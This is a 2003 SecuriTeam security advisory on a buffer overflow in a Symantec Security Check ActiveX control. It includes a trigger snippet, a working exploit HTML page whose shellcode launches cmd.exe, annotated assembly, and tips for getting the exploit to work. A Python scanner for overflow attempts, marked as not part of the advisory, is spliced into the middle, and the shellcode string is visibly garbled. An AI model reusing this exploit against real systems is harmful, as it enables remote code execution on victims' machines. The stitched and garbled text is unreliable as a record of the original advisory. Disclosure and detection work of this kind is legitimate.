[NT] Symantec Security Check Service ActiveX Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 06/24/03

    To: list@securiteam.com
    Date: 24 Jun 2003 16:51:01 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      Symantec Security Check Service ActiveX Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    Symantec offers a free online virus and security scanning service called
    Symantec Security Check. To use it, a user goes to
    http://www.symantec.com/securitycheck/ and selects the kind of scan they
    want to run. To run the scans, ActiveX controls are installed on the
    user's computer. One of these ActiveX controls has been found to contain
    an exploitable buffer overflow.

    DETAILS

    One of the installed ActiveX controls is called "Symantec RuFSI Utility
    Class" and carries the description "Norton Internet Security Registry and
    File Information". There is no documentation of what it does, but it
    appears to collect information about the user's computer in order to
    perform the scans. If a long string is passed in any of the parameters of
    the CompareVersionStrings method, a stack-based overflow occurs when the
    method is executed.

    To reproduce the overflow, just cut-and-paste the following:
    <object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
    </object>

    <script>
    test.CompareVersionStrings("long string here","or long string here")
    </script>

    This ActiveX control is marked as safe, so the above sample will run
    without being blocked in default Internet Explorer security configuration.
    This vulnerability can be exploited to run arbitrary code.
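    As an added defensive example (not part of the advisory), the following Python scans an HTML page for a script that calls CompareVersionStrings on the control's CLSID with an over-long string literal, which is the trigger described above. The 64-byte threshold, the helper names and the sample page are assumptions made for this example.

```python
import re

# CLSID of the "Symantec RuFSI Utility Class" control named in the advisory.
VULN_CLSID = "69deaf94-af66-11d3-bec0-00105aa9b6ae"
# Assumed threshold: real version strings are short; the trigger uses hundreds of bytes.
MAX_ARG_LEN = 64
_OBJECT = re.compile(r'<\s*object\b([^>]*)>', re.I)
_ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
_SCRIPT = re.compile(r'<\s*script\b[^>]*>(.*?)<\s*/\s*script\s*>', re.I | re.S)
_CALL = re.compile(r'(\w+)\s*\.\s*CompareVersionStrings\s*\(', re.I)
_STR = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'', re.S)

def _objects(html):
    """Map each <object id> to its classid, lower-cased without 'clsid:' or braces."""
    out = {}
    for tag in _OBJECT.finditer(html):
        a = {k.lower(): (v1 or v2 or v3) for k, v1, v2, v3 in _ATTR.findall(tag.group(1))}
        out[a.get("id", "").lower()] = a.get("classid", "").lower().replace("clsid:", "").strip("{}")
    return out

def _literal_len(lit):
    # Each JS escape (\xNN, \uNNNN, \n, \", ...) decodes to a single character.
    return len(re.sub(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)', 'x', lit))

def _call_args(script, pos):
    # String literals between the '(' at script[pos] and the first ')' outside a literal.
    i, lits = pos + 1, []
    while i < len(script) and script[i] != ')':
        m = _STR.match(script, i)
        if m:
            lits.append(m.group(1) if m.group(1) is not None else m.group(2)); i = m.end()
        else:
            i += 1
    return lits

def find_overflow_attempts(html):
    """Return (object id, longest argument length) for every CompareVersionStrings
    call on the vulnerable control that passes a literal longer than MAX_ARG_LEN."""
    objects, hits = _objects(html), []
    for script in _SCRIPT.findall(html):
        for m in _CALL.finditer(script):
            obj = m.group(1).lower()
            lens = [_literal_len(s) for s in _call_args(script, m.end() - 1)]
            if objects.get(obj) == VULN_CLSID and lens and max(lens) > MAX_ARG_LEN:
                hits.append((obj, max(lens)))
    return hits

# Constructed sample page: one benign call, then a 300-byte first argument and a ')' hidden in a literal.
SAMPLE = ('<object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test"></object>'
          '<script language=javascript>test.CompareVersionStrings("1.0.1", "1.0.2");\n'
          'test.CompareVersionStrings("' + "A" * 300 + '", "\\x90)");</script>')
```

    Running find_overflow_attempts over proxied or archived HTML flags only calls against this CLSID, so a page that scripts a different control with long strings is not reported.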

    Workaround:
    Go to %SystemRoot%\Downloaded Program Files\ and remove "Symantec RuFSI
    Utility Class".

    Exploit code:
    SecurITeam has built example exploit code that runs cmd.exe whenever the
    HTML below is viewed (note that it has been hard-coded to work with
    Windows 2000 and Internet Explorer 5.5):
    <html>
    <body>
    <object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
    </object>

    <script language=javascript>
    test.CompareVersionStrings("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE", "̐U3W EcEmEdE.EeExEeï xPEPU_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl ")
    </script>
    </body>
    </html>

    <!-- \x90 - NOP
    \xCC - INT3
    \x90 - NOP
    \x90 - NOP
    \x90 - NOP
    \x90 - NOP
    \x8B\xEC - MOV EBP, ESP
    \x55 - PUSH EBP
    \x8B\xEC - MOV EBP, ESP
    \x33\xFF - XOR EDI, EDI
    \x57 - PUSH EDI
    \x83\xEC\x04 - SUB ESP, 4
    \xC6\x45\xF8\x63 - MOV BYTE PTR SS:[EBP-8],63h
    \xC6\x45\xF9\x6D - MOV BYTE PTR SS:[EBP-7],6Dh
    \xC6\x45\xFA\x64 - MOV BYTE PTR SS:[EBP-6],64h
    \xC6\x45\xFB\x2E - MOV BYTE PTR SS:[EBP-5],2Eh
    \xC6\x45\xFC\x65 - MOV BYTE PTR SS:[EBP-4],65h
    \xC6\x45\xFD\x78 - MOV BYTE PTR SS:[EBP-3],78h
    \xC6\x45\xFE\x65 - MOV BYTE PTR SS:[EBP-2],65h
    \xB8\xC3\xAF\x01\x78 - MOV EAX, MSVCRT.system
    \x50 - PUSH EAX
    \x8D\x45\xF8 - LEA EAX, DWORD PTR SS:[EBP-8]
    \x50 - PUSH EAX
    \xFF\x55\xF4 - CALL DWORD PTR SS:[EBP-C]
    \x5F - POP EDI
    -->

    Notes:
    A few things you should notice if you can't get it to work:
    1) Make sure the MDM.exe (Machine Debug Manager) is not running as it
    places the user buffer in places we didn't plan it to jump to.
    2) Make sure there is only ONE instance of iexplore.exe running, as each
    one has a different buffer area.

    ADDITIONAL INFORMATION

    The information has been provided by Cesar (cesarc56@yahoo.com); the
    exploit code was provided by SecurITeam Experts (expert@securiteam.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

